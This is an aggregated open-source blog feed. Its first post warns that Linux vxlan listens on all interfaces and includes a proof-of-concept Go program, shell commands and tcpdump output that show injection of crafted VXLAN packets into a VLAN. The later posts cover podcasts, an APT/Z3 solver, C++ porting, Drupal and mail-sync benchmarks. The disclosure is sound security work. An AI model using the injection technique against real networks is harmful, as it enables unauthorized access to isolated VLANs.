FLOSS Project Planets

Paul Tagliamonte: Be careful when using vxlan!

Planet Debian - Sun, 2021-11-21 21:39

I’ve spent a bit of time playing with vxlan - which is very neat, but also incredibly insecure by default.

When using vxlan, be very careful to understand how the host is connected to the internet. The kernel will listen on all interfaces for packets, which means hosts accessable to VMs it’s hosting (e.g., by bridged interface or a private LAN will accept packets from VMs and inject them into arbitrary VLANs, even ones it’s not on.

I reported this to the kernel mailing list to no reply with more technical details.

The tl;dr is:

$ ip link add vevx0a type veth peer name vevx0z $ ip addr add 169.254.0.2/31 dev vevx0a $ ip addr add 169.254.0.3/31 dev vevx0z $ ip link add vxlan0 type vxlan id 42 \ local 169.254.0.2 dev vevx0a dstport 4789 $ # Note the above 'dev' and 'local' ip are set here $ ip addr add 10.10.10.1/24 dev vxlan0

results in vxlan0 listening on all interfaces, not just vevx0z or vevx0a. To prove it to myself, I spun up a docker container (using a completely different network bridge – with no connection to any of the interfaces above), and ran a Go program to send VXLAN UDP packets to my bridge host:

$ docker run -it --rm -v $(pwd):/mnt debian:unstable /mnt/spam 172.17.0.1:4789 $

which results in packets getting injected into my vxlan interface

$ sudo tcpdump -e -i vxlan0 tcpdump: verbose output suppressed, use -v[v]... for full protocol decode listening on vxlan0, link-type EN10MB (Ethernet), snapshot length 262144 bytes 21:30:15.746754 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746773 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746787 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746801 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746815 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746827 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746870 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746885 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746899 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 21:30:15.746913 de:ad:be:ef:00:01 (oui Unknown) > Broadcast, ethertype IPv4 (0x0800), length 64: truncated-ip - 27706 bytes missing! 33.0.0.0 > localhost: ip-proto-114 10 packets captured 10 packets received by filter 0 packets dropped by kernel

(the program in question is the following:)

 package main  import (      "net"      "os"      "github.com/mdlayher/ethernet"      "github.com/mdlayher/vxlan"  )  func main() {      conn, err := net.Dial("udp", os.Args[1])      if err != nil { panic(err) }      for i := 0; i < 10; i++ {          vxf := &vxlan.Frame{              VNI: vxlan.VNI(42),              Ethernet: &ethernet.Frame{                  Source:      net.HardwareAddr{0xDE, 0xAD, 0xBE, 0xEF, 0x00, 0x01},                  Destination: net.HardwareAddr{0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF},                  EtherType:   ethernet.EtherTypeIPv4,                  Payload:     []byte("Hello, World!"),              },          }          frb, err := vxf.MarshalBinary()          if err != nil { panic(err) }          _, err = conn.Write(frb)          if err != nil { panic(err) }      }  }

When using vxlan, be absolutely sure all hosts that can address any interface on the host are authorized to send arbitrary packets into any VLAN that box can send to, or there’s very careful and specific controls and firewalling. Note this includes public interfaces (e.g., dual-homed private network / internet boxes), or any type of dual-homing (VPNs, etc).

Categories: FLOSS Project Planets

Podcast.__init__: Declarative Deep Learning From Your Laptop To Production With Ludwig and Horovod

Planet Python - Sun, 2021-11-21 21:36
Deep learning frameworks encourage you to focus on the structure of your model ahead of the data that you are working with. Ludwig is a tool that uses a data oriented approach to building and training deep learning models so that you can experiment faster based on the information that you actually have, rather than spending all of our time manipulating features to make them match your inputs. In this episode Travis Addair explains how Ludwig is designed to improve the adoption of deep learning for more companies and a wider range of users. He also explains how the Horovod framework plugs in easily to allow for scaling your training workflow from your laptop out to a massive cluster of servers and GPUs. The combination of these tools allows for a declarative workflow that starts off easy but gives you full control over the end result.Summary

Deep learning frameworks encourage you to focus on the structure of your model ahead of the data that you are working with. Ludwig is a tool that uses a data oriented approach to building and training deep learning models so that you can experiment faster based on the information that you actually have, rather than spending all of our time manipulating features to make them match your inputs. In this episode Travis Addair explains how Ludwig is designed to improve the adoption of deep learning for more companies and a wider range of users. He also explains how the Horovod framework plugs in easily to allow for scaling your training workflow from your laptop out to a massive cluster of servers and GPUs. The combination of these tools allows for a declarative workflow that starts off easy but gives you full control over the end result.

Announcements
  • Hello and welcome to Podcast.__init__, the podcast about Python’s role in data and science.
  • When you’re ready to launch your next app or want to try a project you hear about on the show, you’ll need somewhere to deploy it, so take a look at our friends over at Linode. With the launch of their managed Kubernetes platform it’s easy to get started with the next generation of deployment and scaling, powered by the battle tested Linode platform, including simple pricing, node balancers, 40Gbit networking, dedicated CPU and GPU instances, and worldwide data centers. Go to pythonpodcast.com/linode and get a $100 credit to try out a Kubernetes cluster of your own. And don’t forget to thank them for their continued support of this show!
  • Your host as usual is Tobias Macey and today I’m interviewing Travis Adair about building and training machine learning models with Ludwig and Horovod
Interview
  • Introductions
  • How did you get introduced to Python?
  • Can you describe what Horovod and Ludwig are?
    • How do the projects work together?
  • What was your path to being involved in those projects and what is your current role?
  • There are a number of AutoML libraries available for frameworks such as scikit-learn, etc. What are the challenges that are introduced by applying that workflow to deep learning architectures?
  • What are the use cases that Ludwig is designed to enable?
  • Who are the target users of Ludwig?
    • How do the workflows change/progress for the different personas?
  • How is the underlying framework architected?
    • What are the available extension points to provide a progressive exposure of complexity?
    • How have the goals and design of the project changed or evolved as it has gained more widespread adoption beyond Uber?
      • What was the motivation for migrating the core of Ludwig from Tensorflow to Pytorch?
  • Can you describe the workflow of building a model definition with Ludwig?
    • How much knowledge of neural network architectures and their relevant characteristics is necessary to use Ludwig effectively?
  • What are the motivating factors for adding Horovod to the process?
    • What is involved in moving from a single machine/single process training loop to a multi-core or multi-machine distributed training process?
  • The combination of Ludwig and Horovod provide a shallower learning curve for building and scaling model training. What do you see as their potential impact on the availability and adoption of more sophisticated ML capabilities across organizations of varying scale?
    • What do you see as other significant barriers to widespread use of ML functionality?
  • What are the most interesting, innovative, or unexpected ways that you have seen Ludwig and/or Horovod used?
  • What are the most interesting, unexpected, or challenging lessons that you have learned while working on Ludwig and Horovod?
  • When is Ludwig and/or Horovod the wrong choice?
  • What do you have planned for the future of both projects?
Keep In Touch Picks Closing Announcements
  • Thank you for listening! Don’t forget to check out our other show, the Data Engineering Podcast for the latest on modern data management.
  • Visit the site to subscribe to the show, sign up for the mailing list, and read the show notes.
  • If you’ve learned something or tried out a project from the show then tell us about it! Email hosts@podcastinit.com) with your story.
  • To help other people find the show please leave a review on iTunes and tell your friends and co-workers
Links

The intro and outro music is from Requiem for a Fish The Freak Fandango Orchestra / CC BY-SA

Categories: FLOSS Project Planets

Podcast.__init__: Build Better Analytics And Models With A Focus On The Data Experience

Planet Python - Sun, 2021-11-21 21:06
A lot of time and energy goes into data analysis and machine learning projects to address various goals. Most of the effort is focused on the technical aspects and validating the results, but how much time do you spend on considering the experience of the people who are using the outputs of these projects? In this episode Benn Stancil explores the impact that our technical focus has on the perceived value of our work, and how taking the time to consider what the desired experience will be can lead us to approach our work more holistically and increase the satisfaction of everyone involved.Summary

A lot of time and energy goes into data analysis and machine learning projects to address various goals. Most of the effort is focused on the technical aspects and validating the results, but how much time do you spend on considering the experience of the people who are using the outputs of these projects? In this episode Benn Stancil explores the impact that our technical focus has on the perceived value of our work, and how taking the time to consider what the desired experience will be can lead us to approach our work more holistically and increase the satisfaction of everyone involved.

Announcements
  • Hello and welcome to Podcast.__init__, the podcast about Python’s role in data and science.
  • When you’re ready to launch your next app or want to try a project you hear about on the show, you’ll need somewhere to deploy it, so take a look at our friends over at Linode. With the launch of their managed Kubernetes platform it’s easy to get started with the next generation of deployment and scaling, powered by the battle tested Linode platform, including simple pricing, node balancers, 40Gbit networking, dedicated CPU and GPU instances, and worldwide data centers. Go to pythonpodcast.com/linode and get a $100 credit to try out a Kubernetes cluster of your own. And don’t forget to thank them for their continued support of this show!
  • Your host as usual is Tobias Macey and today I’m interviewing Benn Stancil about the perennial frustrations of working with data and thoughts on how to improve the experience
Interview
  • Introductions
  • How did you get introduced to Python?
  • Can you start by discussing your perspective on the most frustrating elements of working with data in an organization?
    • How might that compound when working with machine learning?
  • What are the sources of the disconnect between our level of technical sophistication and our ability to produce meaningful insights from our data?
  • There have been a number of formulations about a "hierarchy of needs" pertaining to data. When the goal is to bring ML/AI methods to bear on an organization’s processes or products how can thinking about the intended experience act to improve the end result?
    • What are some failure modes or suboptimal outcomes that might be expected when building from a tooling/technology/technique first mindset?
  • What are some of the design elements that we can incorporate into our development environments/data infrastructure/data modeling that can incentivize a more experience driven process for building data products/analyses/ML models?
  • How does the design and capabilities of the Mode platform allow teams to progress along the journey from data discovery to descriptive analytics, to ML experiments?
  • What are the most interesting, innovative, or unexpected approaches that you have seen for encouraging the creation of positive data experiences?
  • What are the most interesting, unexpected, or challenging lessons that you have learned while working on Mode and data analysis?
  • When is a data experience the wrong approach?
  • What do you have planned for the future of Mode to support this ideal?
Keep In Touch Picks Links

The intro and outro music is from Requiem for a Fish The Freak Fandango Orchestra / CC BY-SA

Categories: FLOSS Project Planets

Julian Andres Klode: APT Z3 Solver Basics

Planet Debian - Sun, 2021-11-21 14:49

Z3 is a theorem prover developed at Microsoft research and available as a dynamically linked C++ library in Debian-based distributions. While the library is a whopping 16 MB, and the solver is a tad slow, it’s permissive licensing, and number of tactics offered give it a huge potential for use in solving dependencies in a wide variety of applications.

Z3 does not need normalized formulas, but offers higher level abstractions like atmost and atleast and implies, that we will make use of together with boolean variables to translate the dependency problem to a form Z3 understands.

In this post, we’ll see how we can apply Z3 to the dependency resolution in APT. We’ll only discuss the basics here, a future post will explore optimization criteria and recommends.

Translating the universe

APT’s package universe consists of 3 relevant things: packages (the tuple of name and architecture), versions (basically a .deb), and dependencies between versions.

While we could translate our entire universe to Z3 problems, we instead will construct a root set from packages that were manually installed and versions marked for installation, and then build the transitive root set from it by translating all versions reachable from the root set.

For each package P in the transitive root set, we create a boolean literal P. We then translate each version P1, P2, and so on. Translating a version means building a boolean literal for it, e.g. P1, and then translating the dependencies as shown below.

We now need to create two more clauses to satisfy the basic requirements for debs:

  1. If a version is installed, the package is installed; and vice versa. We can encode this requirement for P above as P == atleast({P1,P2}, 1).
  2. There can only be one version installed. We add an additional constraint of the form atmost({P1,P2}, 1).

We also encode the requirements of the operation.

  1. For each package P that is manually installed, add a constraint P.
  2. For each version V that is marked for install, add a constraint V.
  3. For each package P that is marked for removal, add a constraint !P.
Dependencies

Packages in APT have dependencies of two basic forms: Depends and Conflicts, as well as variations like Breaks (identical to Conflicts in solving terms), and Recommends (soft Depends) - we’ll ignore those for now. We’ll discuss Conflicts in the next section.

Let’s take a basic dependency list: A Depends: X|Y, Z. To represent that dependency, we expand each name to a list of versions that can satisfy the dependency, for example X1|X2|Y1, Z1.

Translating this dependency list to our Z3 solver, we create boolean variables X1,X2,Y1,Z1 and define two rules:

  1. A implies atleast({X1,X2,Y1}, 1)
  2. A implies atleast({Z1}, 1)

If there actually was nothing that satisfied the Z requirement, we’d have added a rule not A. It would be possible to simply not tell Z3 about the version at all as an optimization, but that adds more complexity, and the not A constraint should not cause too many problems.

Conflicts

Conflicts cannot have or in them. A dependency B Conflicts: X, Y means that only one of B, X, and Y can be installed. We can directly encode this in Z3 by using the constraint atmost({B,X,Y}, 1). This is an optimized encoding of the constraint: We could have encoded each conflict in the form !B or !X, !B or !X, and so on. Usually this leads to worse performance as it introduces additional clauses.

Complete example

Let’s assume we start with an empty install and want to install the package a below.

Package: a Version: 1 Depends: c | b Package: b Version: 1 Package: b Version: 2 Conflicts: x Package: d Version: 1 Package: x Version: 1

The translation in Z3 rules looks like this:

  1. Package rules for a:
    1. a == atleast({a1}, 1) - package is installed iff one version is
    2. atmost({a1}, 1) - only one version may be installed
    3. a – a must be installed
  2. Dependency rules for a
    1. implies(a1, atleast({b2, b1}, 1)) – the translated dependency above. note that c is gone, it’s not reachable.
  3. Package rules for b:
    1. b == atleast({b1,b2}, 1) - package is installed iff one version is
    2. atmost({b1, b2}, 1) - only one version may be installed
  4. Dependencies for b (= 2):
    1. atmost({b2, x1}, 1) - the conflicts between x and b = 2 above
  5. Package rules for x:
    1. x == atleast({x1}, 1) - package is installed iff one version is
    2. atmost({x1}, 1) - only one version may be installed

The package d is not translated, as it is not reachable from the root set {a1}, the transitive root set is {a1,b1,b2,x1}.

Next iteration: Optimization

We have now constructed the basic set of rules that allows us to solve solve our dependency problems (equivalent to SAT), however it might lead to suboptimal solutions where it removes automatically installed packages, or installs more packages than necessary, to name a few examples.

In our next iteration, we have to look at introducing optimization; for example, have the minimum number of removals, the minimal number of changed packages, or satisfy as many recommends as possible. We will also look at the upgrade problem (upgrade as many packages as possible), the autoremove problem (remove as many automatically installed packages as possible).

Categories: FLOSS Project Planets

Porting Tok To Not Linux: The Journey Of Incessant Failure

Planet KDE - Sun, 2021-11-21 14:32

This response from a reader pretty much sums it up:

Stop One: Will Craft Work?

Craft seems like the no-brainer for a KDE project to use, considering it's in-house and supports all of KDE's frameworks and has packaging capabilities. Unfortunately, what sounds good on paper does not translate to what's good in execution.

When I first checked it out, the current version being shipped had incorrect code that would have failed to compile had it been a compiled language instead of Python. Heck, even running a typechecker for Python would have revealed the fact that the code was trying to call a function that didn't exist. Yet, this managed to get shipped. Not a good first impression.

After manually patching in the function into existence on my system, I ran into another hurdle: Craft's env script is broken; mangling PATH to an extent where entries like /usr/bin and /bin and other things got just truncated into oblivion, resulting in a shell where you couldn't do much of anything.

After manually patching PATH to be not mangled, I ran into another and the final hurdle before I gave up: Craft tried to use half bundled libraries and tools and half system libraries and tools, resulting in dynamic linker errors from system tools not finding symbols they needed from bundled libraries.

When I brought these issues up in the Craft chat, the answers basically amounted to a lack of care and “go use Ubuntu.” Not acceptable for Tok considering most of the people interested in building Tok like this don't use Ubuntu, and honestly doesn't make you have much faith in a system for porting utilities to other platforms if said system doesn't even work across the distributions of one platform.

Stop Two: Maybe Conan?

Conan seems like the second-in-line no-brainer for Tok to use. It's the largest C++ package manager, even supporting Qbs. Of course, like with Craft, what sounds good on paper doesn't match up to execution.

Out of the gate, I looked at the Qt package, only to find that there was one (1) Qt package for it consisting of the entirety of Qt, WebEngne and all. Kinda oof, but not a deal breaker. Well, it wouldn't be a dealbreaker if Conan had prebuilt Qt packages for

- Settings: arch=x86_64, build_type=Release, compiler=gcc, compiler.version=11, os=Linux

But it doesn't. I'm not going to build an entire web engine just for an attempt at maybe getting a non-Linux build of Tok, and having to build a web engine as part of Tok's CI is a no-go in terms of disk, memory and CPU.

Stop Three: vcpkg

Considering Microsoft has been a developer tools company for about as thrice as long as I've been alive, I hope their take at the C++ package manager thing is worth their salt.

Some weirdness ensued with the VCPKG_ROOT environment variable at first, but it was easy to fix by pointing it at the vcpkg repo.

While doing the vcpkg install, I found the output somewhat hard to follow, so I had no idea how far along it was. I just let it sit since it seemed to be making progress.

While vcpkg didn't have prebuilt binaries for my setup, it didn't require building all Qt modules like Conan did, so the ask was much more reasonable.

And then I noticed a big issue: vcpkg has absolutely zero versioning, other than the git repository with all the package manifests. This essentially means that in order to build with Qt5, I need to commit to an ancient version of vcpkg packages and stay there indefinitely. I also have to ask users to roll back their vcpkg install that far to build Tok. Not really acceptable as an ask for people who might want to build Tok for not Linux.

Stop Four: Wait, It's Already Here (At Least For Macs)

Turns out Nix, the thing that Tok already supports building with, also supports macOS. Well, that was easy. While it doesn't spit out a premade .app like other porting systems can do, it does ensure a working build with available dependencies, which is already most of the way there.

Conclusion: Apples And Penguins Rule, Everyone Else Drools

Cross-platform C++ packaging and distribution is still a very unsolved problem, unlike other languages/frameworks like Go, Electron, Rust, Zig, etc. as I learned painfully through these escapades. Nix seems the most promising on this front, as it offers a very consistent environment across platforms, which gets you most of the way there in terms of building. It doesn't support Windows (yet?), but simply being able to use a functional compiler instead of Apple Clang is already a killer feature for using it to port apps to macOS.

Qbs is also a huge help in terms of the porting process, as it natively supports building things that require auxiliary scripts or build system hacks with other build systems, like .app bundles, Windows installers, and multi-architecture .app/.aab/.apks with just a few or no extra lines in the build system.

For Tok on macOS, all I need to do is add these two lines to the build script in order to get a usable .app file from it:

Depends { name: "bundle" } bundle.isBundle: true

While it lacks a lot of metadata that you need to fill in yourself, it's again, another 99% of the way there solution where the remaining 1% is mostly just a little data or boilerplate or running a tool.

I still haven't figured out what I'll be doing for Windows, but the need for an end-user Windows package is still a long ways off, considering Tok is still nowhere near a 1.0 release status. Perhaps I can make leverage of Fedora's mingw packages or check out https://mxe.cc/, or maybe just install dependencies from source to a Windows system without a package manager, and bundle them during the build process. If you have any suggestions, do feel free to hop on by in the Tok chat and drop them.

Tags: #libre

Categories: FLOSS Project Planets

#! code: Drupal 9: Removing The Summary From The Body Field

Planet Drupal - Sun, 2021-11-21 13:31

I'm not a fan of the summary option on body fields in Drupal. I've never really got on with how users interact with it or the content is produces.

The field type I'm talking about is called "Text (formatted, long, with summary)" and it appears as an add-on summary field to a normal content editor area. It comes as standard on Drupal installs and appears on all body fields. The field type has it's uses, but I often find that the content it produces is unpredictable and doesn't have a great editing experience. I have even written articles in the past about swapping the summary field to a fully fledged wysiwyg area for Drupal 7, which worked on the project I implemented it on.

Let's look at the body summary field in Drupal and see why I have a few problems with it.

The Body Summary

If you create a new content type in Drupal you will automatically get a body field. This field will always be a "Text (formatted, long, with summary) and will have a machine name of "body". This is unlike most other fields in Drupal which get a prefix of "field_" to the field machine name. You can also create your own fields with of the same type as the default body field.

The field footprint looks like this in the field management page of the content type.

When editing or creating a page of content the body field is shown like this.

Read more.

Categories: FLOSS Project Planets

Anarcat: mbsync vs OfflineIMAP

Planet Python - Sun, 2021-11-21 11:04

After recovering from my latest email crash (previously, previously), I had to figure out which tool I should be using. I had many options but I figured I would start with a popular one (mbsync).

But I also evaluated OfflineIMAP which was resurrected from the Python 2 apocalypse, and because I had used it before, for a long time.

Read on for the details.

Benchmark setup

All programs were tested against a Dovecot 1:2.3.13+dfsg1-2 server, running Debian bullseye.

The client is a Purism 13v4 laptop with a Samsung SSD 970 EVO 1TB NVMe drive.

The server is a custom build with a AMD Ryzen 5 2600 CPU, and a RAID-1 array made of two NVMe drives (Intel SSDPEKNW010T8 and WDC WDS100T2B0C).

The mail spool I am testing against has almost 400k messages and takes 13GB of disk space:

$ notmuch count --exclude=false 372758 $ du -sh --exclude xapian Maildir 13G Maildir

The baseline we are comparing against is SMD (syncmaildir) which performs the sync in about 7-8 seconds locally (3.5 seconds for each push/pull command) and about 10-12 seconds remotely.

Anything close to that or better is good enough. I do not have recent numbers for a SMD full sync baseline, but the setup documentation mentions 20 minutes for a full sync. That was a few years ago, and the spool has obviously grown since then, so that is not a reliable baseline.

A baseline for a full sync might be also set with rsync, which copies files at nearly 40MB/s, or 317Mb/s!

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/ 12,647,814,731 100% 37.85MB/s 0:05:18 (xfr#394981, to-chk=0/395815) 72.38user 106.10system 5:19.59elapsed 55%CPU (0avgtext+0avgdata 15988maxresident)k 8816inputs+26305112outputs (0major+50953minor)pagefaults 0swaps

That is 5 minutes to transfer the entire spool. Incremental syncs are obviously pretty fast too:

anarcat@angela:tmp(main)$ time rsync -a --info=progress2 --exclude xapian shell.anarc.at:Maildir/ Maildir/ 0 0% 0.00kB/s 0:00:00 (xfr#0, to-chk=0/395815) 1.42user 0.81system 0:03.31elapsed 67%CPU (0avgtext+0avgdata 14100maxresident)k 120inputs+0outputs (3major+12709minor)pagefaults 0swaps

As an extra curiosity, here's the performance with tar, pretty similar with rsync, minus incremental which I cannot be bothered to figure out right now:

anarcat@angela:tmp(main)$ time ssh shell.anarc.at tar --exclude xapian -cf - Maildir/ | pv -s 13G | tar xf - 56.68user 58.86system 5:17.08elapsed 36%CPU (0avgtext+0avgdata 8764maxresident)k 0inputs+0outputs (0major+7266minor)pagefaults 0swaps 12,1GiO 0:05:17 [39,0MiB/s] [===================================================================> ] 92%

Interesting that rsync manages to almost beat a plain tar on file transfer, I'm actually surprised by how well it performs here, considering there are many little files to transfer.

(But then again, this maybe is exactly where rsync shines: while tar needs to glue all those little files together, rsync can just directly talk to the other side and tell it to do live changes. Something to look at in another article maybe?)

Since both ends are NVMe drives, those should easily saturate a gigabit link. And in fact, a backup of the server mail spool achieves much faster transfer rate on disks:

anarcat@marcos:~$ tar fc - Maildir | pv -s 13G > Maildir.tar 15,0GiO 0:01:57 [ 131MiB/s] [===================================] 115%

That's 131Mibyyte per second, vastly faster than the gigabit link. The client has similar performance:

anarcat@angela:~(main)$ tar fc - Maildir | pv -s 17G > Maildir.tar 16,2GiO 0:02:22 [ 116MiB/s] [==================================] 95%

So those disks should be able to saturate a gigabit link, and they are not the bottleneck on fast links. Which begs the question of what is blocking performance of a similar transfer over the gigabit link, but that's another question altogether, because no sync program ever reaches the above performance anyways.

Finally, note that when I migrated to SMD, I wrote a small performance comparison that could be interesting here. It show SMD to be faster than OfflineIMAP, but not as much as we see here. In fact, it looks like OfflineIMAP slowed down significantly since then (May 2018), but this could be due to my larger mail spool as well.

mbsync

The isync (AKA mbsync) project is written in C and supports syncing Maildir and IMAP folders, with possibly multiple replicas. I haven't tested this but I suspect it might be possible to sync between two IMAP servers as well. It supports partial mirorrs, message flags, full folder support, and "trash" functionality.

Complex configuration file

I started with this .mbsyncrc configuration file:

SyncState * Sync New ReNew Flags IMAPAccount anarcat Host imap.anarc.at User anarcat PassCmd "pass imap.anarc.at" SSLType IMAPS CertificateFile /etc/ssl/certs/ca-certificates.crt IMAPStore anarcat-remote Account anarcat MaildirStore anarcat-local # Maildir/top/sub/sub #SubFolders Verbatim # Maildir/.top.sub.sub SubFolders Maildir++ # Maildir/top/.sub/.sub # SubFolders legacy # The trailing "/" is important #Path ~/Maildir-mbsync/ Inbox ~/Maildir-mbsync/ Channel anarcat # AKA Far, convert when all clients are 1.4+ Master :anarcat-remote: # AKA Near Slave :anarcat-local: # Exclude everything under the internal [Gmail] folder, except the interesting folders #Patterns * ![Gmail]* "[Gmail]/Sent Mail" "[Gmail]/Starred" "[Gmail]/All Mail" # Or include everything Patterns * # Automatically create missing mailboxes, both locally and on the server #Create Both Create slave # Sync the movement of messages between folders and deletions, add after making sure the sync works #Expunge Both

Long gone are the days where I would spend a long time reading a manual page to figure out the meaning of every option. If that's your thing, you might like this one. But I'm more of a "EXAMPLES section" kind of person now, and I somehow couldn't find a sample file on the website. I started from the Arch wiki one but it's actually not great because it's made for Gmail (which is not a usual Dovecot server). So a sample config file in the manpage would be a great addition. Thankfully, the Debian packages ships one in /usr/share/doc/isync/examples/mbsyncrc.sample but I only found that after I wrote my configuration. It was still useful and I recommend people take a look if they want to understand the syntax.

Also, that syntax is a little overly complicated. For example, Far needs colons, like:

Far :anarcat-remote:

Why? That seems just too complicated. I also found that sections are not clearly identified: IMAPAccount and Channel mark section beginnings, for example, which is not at all obvious until you learn about mbsync's internals. There are also weird ordering issues: the SyncState option needs to be before IMAPAccount, presumably because it's global.

Using a more standard format like .INI or TOML could improve that situation.

Stellar performance

A transfer of the entire mail spool takes 56 minutes and 6 seconds, which is impressive.

It's not quite "line rate": the resulting mail spool was 12GB (which is a problem, see below), which turns out to be about 29Mbit/s and therefore not maxing the gigabit link, and an order of magnitude slower than rsync.

The incremental runs are roughly 2 seconds, which is even more impressive, as that's actually faster than rsync:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.015 0.052 1.930 2.029 2.105 user 0.660 0.040 0.592 0.661 0.722 sys 0.338 0.033 0.268 0.341 0.387

Those tests were performed with isync 1.3.0-2.2 on Debian bullseye. Tests with a newer isync release originally failed because of a corrupted message that triggered bug 999804 (see below). Running 1.4.3 under valgrind works around the bug, but adds a 50% performance cost, the full sync running in 1h35m.

Once the upstream patch is applied, performance with 1.4.3 is fairly similar, considering that the new sync included the register folder with 4000 messages:

120.74user 213.19system 59:47.69elapsed 9%CPU (0avgtext+0avgdata 105420maxresident)k 29128inputs+28284376outputs (0major+45711minor)pagefaults 0swaps

That is ~13GB in ~60 minutes, which gives us 28.3Mbps. Incrementals are also pretty similar to 1.3.x, again considering the double-connect cost:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 2.500 0.087 2.340 2.491 2.629 user 0.718 0.037 0.679 0.711 0.793 sys 0.322 0.024 0.284 0.320 0.365

Those tests were all done on a Gigabit link, but what happens on a slower link? My server uplink is slow: 25 Mbps down, 6 Mbps up. There mbsync is worse than the SMD baseline:

===> multitime results 1: mbsync -a Mean Std.Dev. Min Median Max real 31.531 0.724 30.764 31.271 33.100 user 1.858 0.125 1.721 1.818 2.131 sys 0.610 0.063 0.506 0.600 0.695

That's 30 seconds for a sync, which is an order of magnitude slower than SMD.

Great user interface

Compared to OfflineIMAP and (ahem) SMD, the mbsync UI is kind of neat:

anarcat@angela:~(main)$ mbsync -a Notice: Master/Slave are deprecated; use Far/Near instead. C: 1/2 B: 204/205 F: +0/0 *0/0 #0/0 N: +1/200 *0/0 #0/0

(Note that nice switch away from slavery-related terms too.)

The display is minimal, and yet informative. It's not obvious what does mean at first glance, but the manpage is useful at least for clarifying that:

This represents the cumulative progress over channels, boxes, and messages affected on the far and near side, respectively. The message counts represent added messages, messages with updated flags, and trashed messages, respectively. No attempt is made to calculate the totals in advance, so they grow over time as more information is gathered. (Emphasis mine).

In other words:

  • C 2/2: channels done/total (2 done out of 2)
  • B 204/205: mailboxes done/total (204 out of 205)
  • F: changes on the far side
  • N: +10/200 *0/0 #0/0: changes on the "near" side:
    • +10/200: 10 out of 200 messages downloaded
    • *0/0: no flag changed
    • #0/0: no message deleted

You get used to it, in a good way. It does not, unfortunately, show up when you run it in systemd, which is a bit annoying as I like to see a summary mail traffic in the logs.

Interoperability issue

In my notmuch setup, I have bound key S to "mark spam", which basically assigns the tag spam to the message and removes a bunch of others. Then I have a notmuch-purge script which moves that message to the spam folder, for training purposes. It basically does this:

notmuch search --output=files --format=text0 "$search_spam" \ | xargs -r -0 mv -t "$HOME/Maildir/${PREFIX}junk/cur/"

This method, which worked fine in SMD (and also OfflineIMAP) created this error on sync:

Maildir error: duplicate UID 37578.

And indeed, there are now two messages with that UID in the mailbox:

anarcat@angela:~(main)$ find Maildir/.junk/ -name '*U=37578*' Maildir/.junk/cur/1637427889.134334_2.angela,U=37578:2,S Maildir/.junk/cur/1637348602.2492889_221804.angela,U=37578:2,S

This is actually a known limitation or, as mbsync(1) calls it, a "RECOMMENDATION":

When using the more efficient default UID mapping scheme, it is important that the MUA renames files when moving them between Maildir fold ers. Mutt always does that, while mu4e needs to be configured to do it:

(setq mu4e-change-filenames-when-moving t)

So it seems I would need to fix my script. It's unclear how the paths should be renamed, which is unfortunate, because I would need to change my script to adapt to mbsync, but I can't tell how just from reading the above.

Fortunately, someone else already fixed that issue: afew, a notmuch tagging script (much puns, such hurt), has a move mode that can rename files correctly, specifically designed to deal with mbsync. I had already been told about afew, but it's one more reason to standardize my notmuch hooks on that project, it looks like.

(A manual fix is actually to rename the file to remove the U= field: mbsync will generate a new one and then sync correctly.)

Stability issues

The newer release in Debian bookworm (currently at 1.4.3) has stability issues on full sync. I filed bug 999804 in Debian about this, which lead to a thread on the upstream mailing list. I have found at least three distinct crashes that could be double-free bugs "which might be exploitable in the worst case", not a reassuring prospect.

The thing is: mbsync is really fast, but the downside of that is that it's written in C, and with that comes a whole set of security issues. The Debian security tracker has only three CVEs on isync, but the above issues show there could be many more.

Reading the source code certainly did not make me very comfortable with trusting it with untrusted data. I considered sandboxing it with systemd (below) but having systemd run as a --user process makes that difficult. I also considered using an apparmor profile but that is not trivial because we need to allow SSH and only some parts of it...

Thankfully, upstream has been diligent at addressing the issues I have found. They provided a patch within a few days which did fix the sync issues.

Automation with systemd

The Arch wiki has instructions on how to setup mbsync as a systemd service. It suggests using the --verbose (-V) flag which is a little intense here, as it outputs 1444 lines of messages.

I have used the following .service file:

[Unit] Description=Mailbox synchronization service ConditionHost=!marcos Wants=network-online.target After=network-online.target Before=notmuch-new.service [Service] Type=oneshot ExecStart=/usr/bin/mbsync -a Nice=10 IOSchedulingClass=idle NoNewPrivileges=true [Install] WantedBy=default.target

And the following .timer:

[Unit] Description=Mailbox synchronization timer ConditionHost=!marcos [Timer] OnBootSec=2m OnUnitActiveSec=5m Unit=mbsync.service [Install] WantedBy=timers.target

Note that we trigger notmuch through systemd, with the Before and also by adding mbsync.service to the notmuch-new.service file:

[Unit] Description=notmuch new After=mbsync.service [Service] Type=oneshot Nice=10 ExecStart=/usr/bin/notmuch new [Install] WantedBy=mbsync.service

